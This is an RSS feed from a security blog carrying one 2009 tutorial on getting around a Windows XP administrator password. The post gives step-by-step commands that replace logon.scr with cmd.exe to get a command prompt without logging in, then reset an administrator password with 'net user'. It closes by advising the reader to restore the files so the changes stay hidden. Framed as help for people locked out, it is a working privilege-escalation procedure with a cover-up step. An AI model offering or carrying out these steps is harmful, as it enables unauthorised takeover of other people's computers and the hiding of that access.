<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Volk Defense - Security &#38; Software Discussions &#187; trick</title>
	<atom:link href="http://www.volkdefense.com/tag/trick/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.volkdefense.com</link>
	<description>Assisting In Security</description>
	<lastBuildDate>Fri, 23 Jul 2010 00:57:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>How To Bypass XP Admin’s Password</title>
		<link>http://www.volkdefense.com/2009/08/20/how-to-bypass-xp-admins-password/</link>
		<comments>http://www.volkdefense.com/2009/08/20/how-to-bypass-xp-admins-password/#comments</comments>
		<pubDate>Thu, 20 Aug 2009 18:58:41 +0000</pubDate>
		<dc:creator>Gerardo</dc:creator>
				<category><![CDATA[Tips & Tricks]]></category>
		<category><![CDATA[account]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[featured]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[tip]]></category>
		<category><![CDATA[trick]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[xp. admin]]></category>

		<guid isPermaLink="false">http://www.volkdefense.com/?p=187</guid>
		<description><![CDATA[All of us in one time have been locked out of our computer and forced to login a Guest or Limited Account (well that is if you have it enabled).... <a class="meta-more" href="http://www.volkdefense.com/2009/08/20/how-to-bypass-xp-admins-password/">Read more <span class="meta-nav">&#187;</span></a>]]></description>
			<content:encoded><![CDATA[<div id="attachment_188" class="wp-caption alignright" style="width: 160px"><a href="http://www.volkdefense.com/wp-content/uploads/2009/08/xp.jpg"><img class="size-thumbnail wp-image-188" title="xp" src="http://www.volkdefense.com/wp-content/uploads/2009/08/xp-150x150.jpg" alt="Windows XP" width="150" height="150" /></a><p class="wp-caption-text">Windows XP</p></div>
<p>All of us in one time have been locked out of our computer and forced to login a Guest or Limited Account (well that is if you have it enabled). While operating systems are changing from Windows Vista to the upcoming Windows 7, some people are still using Windows XP and sometimes, you may forget your password. There are still some old tricks you can use to bypass Windows XP protection and enable a Admin Account.</p>
<p>1.) Goto Start &gt; Run &gt; Type in CMD (Command Prompt Shortcut)</p>
<p>2.) Once Command Prompt opens (it should be a window with  black background and white letters, it depends on your settings)</p>
<p>3.) Type the following:</p>
<p><strong>cd\</strong> *drops to root<br />
<strong>cd\windows\system32</strong> *directs to the system32 dir<br />
<strong>mkdir temphack</strong> *creates the folder temphack<br />
<strong>copy logon.scr temphack\logon.scr</strong> *backsup logon.scr<br />
<strong>copy cmd.exe temphack\cmd.exe</strong> *backsup cmd.exe<br />
<strong>del logon.scr</strong> *deletes the original logon.scr<br />
<strong>rename cmd.exe logon.scr</strong> *renames cmd.exe to logon.scr<br />
<strong>exit</strong> *quits dos</p>
<p>Now what you have just done is you made the  computer backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP</p>
<p>Once you restart and you see the same window you saw when you entered the commands above,  type the following in the Command Prompt:</p>
<p><strong>“net user &lt;admin account name here&gt; password”</strong></p>
<p>If the Administrator Account is called &#8220;Bob&#8221; and you want the password to be &#8220;abc&#8221; enter this</p>
<p>“net user Bob abc”</p>
<p>So once you ran the command with the account name and password you desire, go ahead and logout and log back in with the account or restart and then login with the account you created. After you&#8217;re done and enter in your admin account, don&#8217;t forget to copy the contents of temphack back into the system32 directory (makes your changes hidden).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.volkdefense.com/2009/08/20/how-to-bypass-xp-admins-password/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
